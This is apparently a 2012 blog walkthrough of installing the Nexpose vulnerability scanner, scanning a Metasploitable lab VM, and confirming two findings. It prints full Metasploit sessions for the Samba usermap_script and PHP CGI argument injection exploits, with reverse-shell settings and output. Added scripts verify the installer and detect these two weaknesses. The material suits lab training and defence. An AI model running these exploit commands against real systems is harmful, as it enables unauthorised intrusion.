Nexpose Community Edition is a free vulnerability scanner, a single-user version of the award-winning Rapid7 Nexpose Enterprise solution.
Installed for testing on Backtrack 5R3. Note that you may require different packages than I did; during the install it told me what I required.
Just note down any it asks for and then apt-get install (package).
Also, it will ask for 8GB of RAM (insane request! I gave it 4GB and it works).
1. Install the packages that are required to run NeXpose (you may require others; it will tell you what you need as you install)
root@bt:~# apt-get install libstdc++5
2. Download Nexpose Community Edition from http://www.rapid7.com/vulnerability-scanner.jsp (32bit or 64bit linux version)
3. Make the .bin executable.
root@bt:~# chmod +x NeXposeSetup-Linux32.bin
4. Run the installer.
root@bt:~/NeXpose# ./NeXposeSetup-Linux32.bin
5. Follow the instructions on the screen to install Nexpose.
6. Log in at https://localhost:3780/
It installs into the directory /opt/rapid7/nexpose.
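The six steps above come down to a few shell commands, and the thing worth adding before a downloaded .bin is run as root is an integrity check. The script below is an added example, not part of the original post and not Rapid7's installer code: the SHA-256 value is a placeholder to be replaced with the one published on the download page, and the RAM check reads /proc/meminfo (or a file you pass in) so the 4GB-versus-8GB point above can be looked at before the installer complains.

```shell
#!/bin/sh
# Added example, not from the original post: pre-flight checks before the
# chmod +x / run steps of the install. Anything fetched over the web and
# then run as root deserves an integrity check first; the expected SHA-256
# passed in below is a placeholder, the real value comes from the vendor.

# Return 0 when the file's SHA-256 matches $2, 1 otherwise.
verify_installer() {
    file="$1"
    expected="$2"
    [ -f "$file" ] || { echo "missing installer: $file" >&2; return 1; }
    actual=$(sha256sum "$file" | awk '{ print $1 }')
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    echo "checksum mismatch for $file (got $actual)" >&2
    return 1
}

# Print MemTotal in MB from a /proc/meminfo-style file (default: the real one).
mem_total_mb() {
    meminfo="${1:-/proc/meminfo}"
    awk '/^MemTotal:/ { printf "%d\n", $2 / 1024 }' "$meminfo"
}

# Return 0 when the host reports at least $1 GB. The kernel's MemTotal is a
# few percent below the installed amount, so allow 5% slack.
has_min_ram() {
    min_gb="$1"
    meminfo="${2:-/proc/meminfo}"
    mb=$(mem_total_mb "$meminfo")
    [ "${mb:-0}" -ge $(( min_gb * 1024 * 95 / 100 )) ]
}

# Steps 3 and 4 of the post, gated on the checks above. The installer asks
# for 8GB; the post found 4GB workable, so only warn below that.
install_nexpose() {
    installer="$1"
    expected_sha256="$2"
    verify_installer "$installer" "$expected_sha256" || return 1
    if ! has_min_ram 4; then
        echo "warning: less than 4GB RAM reported; the installer asks for 8GB" >&2
    fi
    case "$installer" in
        /*|./*) ;;
        *) installer="./$installer" ;;
    esac
    chmod +x "$installer"   # step 3
    "$installer"            # step 4
}

# Usage (placeholder hash; substitute the vendor's published value):
# install_nexpose NeXposeSetup-Linux32.bin 0000000000000000000000000000000000000000000000000000000000000000
```

The checksum comparison is the part that matters: a mismatch means the file is not the one the vendor published, whatever the cause, and the installer should not be run until that is explained.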
Results
Tested against a virtual machine (VirtualBox) running Metasploitable: https://myexploit.wordpress.com/web-application-metasploitable/
Screenshot of the results, filtered to show the findings that have Metasploit exploits. (All but two proved to be false positives.)
Below, clicking on the Samba MS-RPC Shell link shows the exploit description; you can then search for this in Metasploit manually.
Manual search demonstration and exploit.
msf > search Samba "username map script" Command Execution
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/samba/usermap_script 2007-05-14 00:00:00 UTC excellent Samba "username map script" Command Execution
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set lhost 192.168.56.102
msf exploit(usermap_script) > set rhost 192.168.56.101
msf exploit(usermap_script) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(usermap_script) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:60636) at 2012-12-10 12:19:50 +0000
ls -l
total 89
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Dec 10 06:25 dev
drwxr-xr-x 95 root root 4096 Dec 10 06:25 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx------ 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw------- 1 root root 14473 Dec 10 06:25 nohup.out
And the other working exploit:
msf > search PHP CGI Argument Injection
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/php_cgi_arg_injection 2012-05-03 00:00:00 UTC excellent PHP CGI Argument Injection
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > set lhost 192.168.56.102
msf exploit(php_cgi_arg_injection) > set rhost 192.168.56.101
msf exploit(php_cgi_arg_injection) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Sending stage (39217 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:59982) at 2012-12-10 12:24:49 +0000
meterpreter > shell
Process 5183 created.
Channel 0 created.
ls -l
total 72
drwxrwxrwt 2 root root 4096 May 20 2012 dav
drwxr-xr-x 8 www-data www-data 4096 May 20 2012 dvwa
-rw-r--r-- 1 www-data www-data 891 May 20 2012 index.php
drwxr-xr-x 10 www-data www-data 4096 May 14 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4096 May 14 2012 phpMyAdmin
-rw-r--r-- 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4096 May 14 2012 test
drwxrwxr-x 22 www-data www-data 20480 Apr 19 2010 tikiwiki
drwxrwxr-x 22 www-data www-data 20480 Apr 16 2010 tikiwiki-old
drwxr-xr-x 7 www-data www-data 4096 Apr 16 2010 twiki
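Both findings the scanner got right can be confirmed with a local check that does not involve running an exploit, which is how to validate them on a host you look after rather than a lab VM. The script below is an added example, not from the original post and not part of Metasploit or Nexpose: a Samba check that flags an active username map script setting in smb.conf (the setting the usermap_script module depends on) and an Apache access-log check that counts requests to a .php URL whose query string starts with a dash, the shape of the PHP CGI argument injection above. The sample smb.conf and log lines are constructed, and the default paths in audit_host are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: non-intrusive checks for the two
# findings the scanner got right, for confirming them on a host you
# administer instead of by exploitation. Paths in audit_host are assumptions.

# Constructed sample inputs (not real captured data).
SMB_CONF_SAMPLE='[global]
   workgroup = WORKGROUP
   ; username map script = /path/to/old.sh
   username map script = /path/to/usermap.sh
   security = user'

ACCESS_LOG_SAMPLE='192.168.56.102 - - [10/Dec/2012:12:24:49 +0000] "GET /index.php?-s HTTP/1.1" 200 891
192.168.56.102 - - [10/Dec/2012:12:24:50 +0000] "GET /phpinfo.php HTTP/1.1" 200 19
192.168.56.102 - - [10/Dec/2012:12:24:51 +0000] "GET /index.php?%2Ds HTTP/1.1" 200 891
192.168.56.102 - - [10/Dec/2012:12:24:52 +0000] "GET /dvwa/index.php?page=-1 HTTP/1.1" 200 4096'

# Samba: print every active "username map script" line in the given smb.conf.
# Returns 0 if the setting is active, 1 if not. Commented lines (# or ;) are
# excluded by the leading anchor; case and the spaces between the words are
# ignored because Samba itself ignores them in parameter names. The
# usermap_script module only works when this option is set on an affected
# Samba release, so the fix is to update Samba and drop the option where it
# is not needed.
samba_username_map_script() {
    grep -iE '^[[:space:]]*username[[:space:]]*map[[:space:]]*script[[:space:]]*=' "$1"
}

# php-cgi: count access-log requests to a .php URL whose query string begins
# with "-" (literal or URL-encoded as %2d), the shape of a CGI argument
# injection attempt. Prints the count; returns 0 if any were found, 1 if none.
# Ordinary parameters such as ?page=-1 do not match because the dash must be
# the first character after the "?".
php_cgi_arg_injection_hits() {
    grep -cE '"(GET|POST) [^ "?]*\.php\?(-|%2[dD])[A-Za-z]' "$1"
}

# Run both checks against the usual locations (assumed default paths).
audit_host() {
    smb_conf="${1:-/etc/samba/smb.conf}"
    access_log="${2:-/var/log/apache2/access.log}"
    if [ -f "$smb_conf" ] && samba_username_map_script "$smb_conf" >/dev/null; then
        echo "FINDING: username map script is active in $smb_conf"
    fi
    if [ -f "$access_log" ]; then
        echo "php-cgi argument injection attempts in $access_log: $(php_cgi_arg_injection_hits "$access_log")"
    fi
}

# Usage on a live host: audit_host /etc/samba/smb.conf /var/log/apache2/access.log
```

Against the constructed samples the Samba check reports the one uncommented line and the log check counts two requests (the literal and the percent-encoded dash), ignoring the phpinfo request and the ?page=-1 parameter. A hit from the log check is worth correlating with the php-cgi version actually installed, and a hit from the Samba check is worth a version check before anyone reaches for msfconsole.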